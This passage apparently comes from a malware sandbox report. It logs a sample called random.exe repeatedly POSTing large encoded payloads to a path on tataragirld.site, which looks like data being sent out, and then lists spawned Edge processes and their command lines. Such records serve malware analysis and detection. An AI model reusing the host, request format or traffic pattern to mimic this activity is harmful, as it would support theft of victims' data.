                                                                                                                                                                                                                                                                                  2025-01-03 22:33:08 UTC14398OUTData Raw: a4 be 80 a2 98 88 b2 98 ba 96 80 84 a0 8a 8c 8a b8 8c 96 98 96 8a 8c 82 84 b2 96 b6 9e 9a b2 8e 9e bc 9e a2 94 a2 b0 8a b8 a4 94 94 9c 8e 92 96 a4 8a 8a 86 bc 9c 8c 9a 88 8e 8a 9e b6 b8 96 b2 ba 98 b4 9c 86 88 9c 9e 8e 80 8e b8 a4 86 a4 96 be 84 be 98 b4 9a 96 9e a2 9a b8 9c a2 8e be 88 a2 9a 96 9e 82 96 8a 9e ba 86 a4 b4 bc 8c 80 ba b2 b8 88 b2 88 80 ba b8 b0 b4 a4 a0 94 bc a2 8a b0 92 9c 94 88 b6 be 86 b6 b6 86 94 9e be 96 be 94 9c 9a 9a a4 82 92 a4 ba a4 9e 9a a2 8a a2 94 b6 a0 a2 ba 96 80 9a 92 88 9c 84 b4 b6 9e be b2 84 8a 92 94 8c b2 80 b6 a4 92 8c 98 98 b8 a2 8a bc 84 86 a0 9c 9c 9c 98 9a 9a 8c a4 92 9e b4 9e bc 88 80 9c 9a 88 bc 8e b6 9e b8 a0 bc 8e 8e b0 9c 9e 96 b2 98 b6 9c be 8e a2 86 86 8e a2 ba 80 9c be 8a a0 be b0 88 80 9c 82 82 b0 8e b4 8a
                                                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:08 UTC788INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:08 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UbFaviQVMvUrdN2Qed%2BNPyFfxU1oWf99vf9BxIxsVdeRr0e%2BACZxTSXZSobxdTnSPzrNPrtoV4H4MxNHBFDfjV5BRjUV1hjc3JUON4y6Hhv2qpcCFbToRHzq7R7BBGZ9Knxu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672e24980c327-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1506&rtt_var=714&sent=14&recv=34&lost=0&retrans=0&sent_bytes=2839&recv_bytes=30860&delivery_rate=1386514&cwnd=189&unsent_bytes=0&cid=33dd319919933c8b&ts=427&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  24192.168.2.449936188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC430OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 100087
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 bc 86 01 00 08 00 00 00 67 d5 8c 10 10 10 10 10 84 32 10 10 10 10 10 10 de bb 09 30 27 91 5d 7e 74 78 7a 76 7c 5b c4 ce cc da f6 37 04 10 8b 84 da 33 35 8b 1a 10 8b 18 10 8f 10 10 10 12 ef f9 10 10 a3 5c 82 cc f8 da c8 40 b4 42 50 96 ce f4 da 40 b8 8a 42 74 50 96 b0 ba 50 7c 7c 70 70 50 90 50 74 4c 78 70 50 9e 80 e4 33 6f 8a c2 d6 f4 ce f6 ce dc f8 50 94 d2 f6 c2 d6 50 98 c2 f6 f0 c8 d2 e2 50 92 d8 d2 f0 f8 da f4 91 97 a9 10 b7 51 5d b6 e2 f6 f8 da ca 41 b4 da de c2 f6 f8 f4 e2 41 f6 ca f6 f6 4c da e0 da 43 d6 f6 f4 f6 f6 4c da e0 da 47 fe c2 cc c2 cc c2 f8 4c da e0 da 43 d6 f6 f4 f6 f6 4c da e0 da 49 fe c2 cc c8 ce de ce cc 4c da e0 da 49 f6 da f4 fc c2 d6 da f6 4c da e0 da 43 c8 f6 d2
                                                                                                                                                                                                                                                                                  Data Ascii: }g20']~txzv|[735\@BP@BtPP||ppPPtLxpP3oPPPQ]AALCLGLCLILILC
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC15331OUTData Raw: 0b 22 5d dd 03 99 98 3b ab 0c 36 a8 2a dd f1 39 26 b8 e7 0d 27 39 04 29 ce 8c f6 c0 fc b5 81 cc 27 40 6a f1 6b f9 0b 7c e1 92 89 e9 4b 5f ff 6a a6 3d 54 0d 1d a1 2c 71 c4 b6 74 90 74 7e 6d 27 ce 6d 08 b7 dd ce 77 e6 f2 6e 74 07 27 13 93 ea 8d 9e f1 da 23 dd a1 32 5e 2e dc 3b 00 88 22 21 55 e6 24 03 90 59 34 32 e1 39 92 d0 f0 26 64 57 7c 6e d5 35 6e 49 a5 52 14 db 62 c1 cd 84 f9 c8 cb c2 99 04 32 e1 24 56 6f 81 37 84 e0 88 18 dd 49 23 39 2b 09 5b 01 91 a6 7e e2 25 af e7 db 3a 9d 5e bf 3a 54 2e ea 75 b8 a2 7e 80 33 ab e2 d5 2e 59 57 80 9d fd bd d1 86 d0 76 6d 72 47 7a 97 60 47 fc a3 86 74 3c d2 4c d9 d9 9d 28 ca ba 35 d3 56 7f f5 60 b3 4d 20 6d ff 9f b7 b4 e2 16 53 23 ac 4b 4a d1 59 5e bf af 9f 79 bd 83 39 12 7b 52 fa 0f b0 7b 76 e0 b9 3e a4 39 e7 46 c7 c0
                                                                                                                                                                                                                                                                                  Data Ascii: "];6*9&'9)'@jk|K_j=T,qtt~m'mwnt'#2^.;"!U$Y429&dW|n5nIRb2$Vo7I#9+[~%:^:T.u~3.YWvmrGz`Gt<L(5V`M mS#KJY^y9{R{v>9F
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC15331OUTData Raw: 62 31 59 49 72 af e5 63 d0 fa 0f e8 29 19 b4 5c e9 d7 d9 bf 97 30 81 f3 db ea 54 71 1a cb 3e 88 1b d7 6f a1 39 b8 f4 a1 0b c0 87 f4 24 a4 61 a6 12 85 98 90 59 cc 13 b8 d4 3c b7 89 89 71 30 fe 6f 48 2b 00 b9 3c 47 76 63 8e e2 b9 ea ec e1 5b cc f3 b4 53 49 7d ae dc 2d f3 2e a6 eb 5c 1b f5 a0 e8 76 bf 47 9e 3d 3b 9b 92 bc 56 b8 72 d2 cf 2e 35 c1 41 fc 27 e2 5b 6e 33 e2 22 c2 b1 46 9e f1 0d 53 ed 4a e1 83 a2 aa 6e 8c c6 31 00 18 2c ac 9a 3e 21 53 cc 2c b1 42 d3 1d 3b 5e 9c 85 1b 6e e7 d8 a6 9d ee 01 73 d1 e7 e9 cb 3b 29 87 13 7d 2e 4b fe 5b 27 07 6a 7b 92 d5 d6 27 8e 8c d5 9b cc fc 3d b5 79 02 5d 29 2e 56 ce 64 b8 97 ae c0 53 6e 18 4d c1 db df 67 22 56 91 c5 1f a1 e7 5c 5b 6b 33 6c 2d f6 32 bc 4e 4e 4a 4f d5 d4 ec c5 8b 43 7c aa ec 89 9d 85 cc ca c8 81 46 d9
                                                                                                                                                                                                                                                                                  Data Ascii: b1YIrc)\0Tq>o9$aY<q0oH+<Gvc[SI}-.\vG=;Vr.5A'[n3"FSJn1,>!S,B;^ns;)}.K['j{'=y]).VdSnMg"V\[k3l-2NNJOC|F
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC15331OUTData Raw: 3d c9 e6 27 36 48 1b fa c7 47 2d e0 d9 ff 3b 5d 4c d6 55 32 70 2e 3b 0d fe 50 19 14 77 38 1a 26 9e ae cb 85 69 e9 a3 3a 16 f9 78 cb da b9 8e 8d a5 b1 cb ca 2f 35 01 67 7e 80 4d dc 76 35 5b 48 e6 2a 1b e0 3b 5c 7f ef 7a e7 db 9d 28 d9 c2 54 3a 79 41 44 62 ae db e0 e1 98 44 fb f9 e1 4e 32 21 30 54 14 0b 1c d2 53 ae 6c 9d 61 52 af 48 a3 0e 5a c9 e4 c2 03 b4 41 b6 4e a2 21 ca bf d9 2b a9 c6 43 e3 7f de c4 ed c3 22 e1 ef fb 0d ee 65 c4 8b 05 00 69 3d 6f c1 44 bd ef c3 45 b9 6f f7 ec c0 ce 54 50 a5 f6 68 0d 20 f7 9b 36 12 8c 17 5c ff 29 de b6 7f 4f 84 e8 d4 29 09 3b 01 4c 25 ea 3e d5 af aa 87 71 f1 96 ee 6d c0 e5 f7 21 96 5f d0 13 9a a3 56 96 74 ef 1d 69 c6 04 29 3b f4 5b cf 26 6b 5a cb 23 57 f6 99 f9 08 87 b3 4a 27 66 82 25 48 70 8f 7d 8e ba f1 e6 7a 36 4f b5
                                                                                                                                                                                                                                                                                  Data Ascii: ='6HG-;]LU2p.;Pw8&i:x/5g~Mv5[H*;\z(T:yADbDN2!0TSlaRHZAN!+C"ei=oDEoTPh 6\)O);L%>qm!_Vti);[&kZ#WJ'f%Hp}z6O
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC15331OUTData Raw: 3d 50 ed df fb 5b ee 80 1c 95 7f 9f d6 17 32 04 0a c2 e0 69 9a 68 5a 88 44 b5 2f 0c d6 18 ed bd 78 0b 72 92 18 c0 31 5b 9f 13 44 b5 81 e6 7b 24 22 76 82 ca 75 48 15 fa 8d ef 9e 69 45 c0 76 f4 1e 0e a7 b8 21 b5 d8 70 a9 e2 c0 f7 1e da d4 f1 f1 33 69 fe 4b b3 a0 6e 9b 72 d5 21 fc cd 83 bc 5c 3f 82 61 d8 93 27 fa cd 38 e7 4a bb b0 c9 7b d0 b3 2c 16 cc 39 33 0a 41 dc 5a 53 14 a7 41 7b 1a 64 c3 ba f7 e7 19 d0 b5 96 8f 5a 29 55 50 69 9a af d6 fd ce d6 88 46 73 5e 85 f4 87 d1 89 19 a2 e3 9d 70 29 6c 8d 70 b5 c7 5b 0e 77 63 30 c7 46 6d 84 fe a3 5e 43 8a 2f d2 f3 9e 1d 7c 9e 3d e2 ce 34 8b cc 09 5d 5d ea ab 9a 68 87 5d 6e a5 04 eb 51 ab 0f 6f 2a 3a e4 16 5d 39 41 b3 e7 a8 cd 33 25 fa e1 e3 91 a2 6f cd aa f8 65 58 45 45 42 fd 48 e7 07 b8 4f 75 8a 5d ad 1f fa f9 88
                                                                                                                                                                                                                                                                                  Data Ascii: =P[2ihZD/xr1[D{$"vuHiEv!p3iKnr!\?a'8J{,93AZSA{dZ)UPiFs^p)lp[wc0Fm^C/|=4]]h]nQo*:]9A3%oeXEEBHOu]
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC15331OUTData Raw: 96 8c e4 50 54 e5 f2 c7 77 35 86 0a 76 d2 9c 86 d2 2e cf a9 f8 fe 9c bf 27 1e 00 91 ad 5d ed 8b 64 41 3b 0c e3 b7 89 44 6c f6 3d f8 31 7e f3 13 ea a6 98 03 00 21 ea 58 14 ae c4 69 6b 88 b4 1e b7 d7 b4 de 66 98 6b 97 f7 16 f4 74 1e be 0e c9 05 4b e3 d2 50 17 13 b9 c6 50 18 88 a0 c1 b1 25 51 b4 f6 07 70 94 18 3c 76 89 ec 23 83 8e 5b 2c 73 cb 25 2f 60 34 13 f9 30 cf 63 9d 1c f3 ce 74 1e f8 a0 2b 79 fc c3 75 86 d2 4c dd 49 d2 ea 88 1c 16 c1 5a 32 e2 4b fc aa 4f 3e 7e 19 dd d5 00 83 a3 8d f4 95 eb 0d 47 d4 d6 7e c9 f2 02 e5 41 1f fe 62 4f 1f 34 48 4c 73 e0 a9 1d 7e 8f 21 9d e0 1a 3a 64 e3 89 00 b3 02 58 75 c1 c4 a5 da f5 4d a6 26 a9 e1 a5 fb 85 17 fa 88 53 cc 1d 7b dc db db d2 c4 17 6d 1f 81 4e af 4e 0d c0 32 86 ec 1f cf d5 27 ad ba af 31 3a 26 ce 38 06 e3 20
                                                                                                                                                                                                                                                                                  Data Ascii: PTw5v.']dA;Dl=1~!XikfktKPP%Qp<v#[,s%/`40ct+yuLIZ2KO>~G~AbO4HLs~!:dXuM&S{mNN2'1:&8
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC8101OUTData Raw: 8d 19 98 9f 11 fb ec 09 1c 3d ce a0 87 c8 84 78 1b bc b7 78 7c ee a9 ba 8b ae 8e 28 00 7c 31 9d 6a b5 ee 5a 29 c5 f3 05 6e c2 5c a6 9d 24 97 e9 0b 3b 27 d3 be bd 1e 7f 8e f3 47 b1 6e 6e ef 05 7b 87 d5 67 aa ac 19 06 38 e8 c6 2b e6 96 1d 6b 97 e6 5e 1b fd a7 95 ab a2 16 62 0d 38 ae 2d e5 db e2 66 85 3e 5e a5 03 5e 28 40 b7 c7 1a 8a 76 8d d9 fe fc 15 96 7b 82 17 4f c5 49 a0 ec 86 4f e1 50 1d 6d d2 e7 10 c2 e5 bf a1 68 ad 75 9d dd 5d 11 b3 5e ff 30 4d 6e 0b 2f 2c e8 4d 5c 02 ba 5c fe e5 9b c5 e4 c4 db 40 f0 c9 e7 52 f8 a7 df 5b cb 8b 65 e1 7e 48 f7 e4 91 c2 27 7f 26 e6 13 04 c1 ac 85 77 03 3d 5a f0 13 bb ca ab 12 9e 7e 03 5f 17 69 af 7a 5a 1e 9f 99 ee b7 76 23 7f 26 00 f3 89 83 71 bd 6a f6 af 3b 87 61 da cf fc fb 88 eb bf 3d 4b e0 19 75 20 db c5 a7 54 db 02
                                                                                                                                                                                                                                                                                  Data Ascii: =xx|(|1jZ)n\$;'Gnn{g8+k^b8-f>^^(@v{OIOPmhu]^0Mn/,M\\@R[e~H'&w=Z~_izZv#&qj;a=Ku T
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:09 UTC794INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:09 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NYZmZM%2BIiqViq8NFuG6QStUX18DxPOIHJGE0ZQ%2FitI4GDgQvYdO1KDnLasGWFELafD%2BdOXITNYq%2BrSpP8pUQBjPQKl7ggC9H0K4Ea29rW1WmRzNOqeBvFcG4UMC4wKmAgFQl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672e84bd26a52-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1595&rtt_var=630&sent=51&recv=108&lost=0&retrans=0&sent_bytes=2840&recv_bytes=101417&delivery_rate=1830721&cwnd=210&unsent_bytes=0&cid=5d0d0f949273a95f&ts=633&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  25192.168.2.449942188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:10 UTC426OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:10 UTC35OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:10 UTC728INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:10 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7RhZ%2BvJFdH%2FC8nuZZXr385w%2FPziSyYPxYL1VLROI6DSJxsLA97170Xc44jrKZxk1bpgvrjfAVidYcqRLBDOBrQO762%2BUxqvanFf93sRpVVLPSzs2d5qreaeHJdmp8wWxTIf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672ef7b0e1a28-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1927&rtt_var=749&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1097&delivery_rate=1434889&cwnd=138&unsent_bytes=0&cid=c67059389ca073fa&ts=321&x=0"


                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                  Start time:17:31:54
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\random.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6166e0000
                                                                                                                                                                                                                                                                                  File size:2'636'800 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:A9172666DA67D245C710FD71407178F1
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                  Start time:17:32:35
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                  Start time:17:32:35
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2056,i,4096293946836122851,18064520161421918287,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                  Start time:17:32:35
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                  Start time:17:32:36
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                  Start time:17:32:39
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6472 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                  Start time:17:32:39
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6644 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                  Start time:17:32:41
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7408f0000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                  Start time:17:32:41
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7408f0000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                                  Start time:17:32:52
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
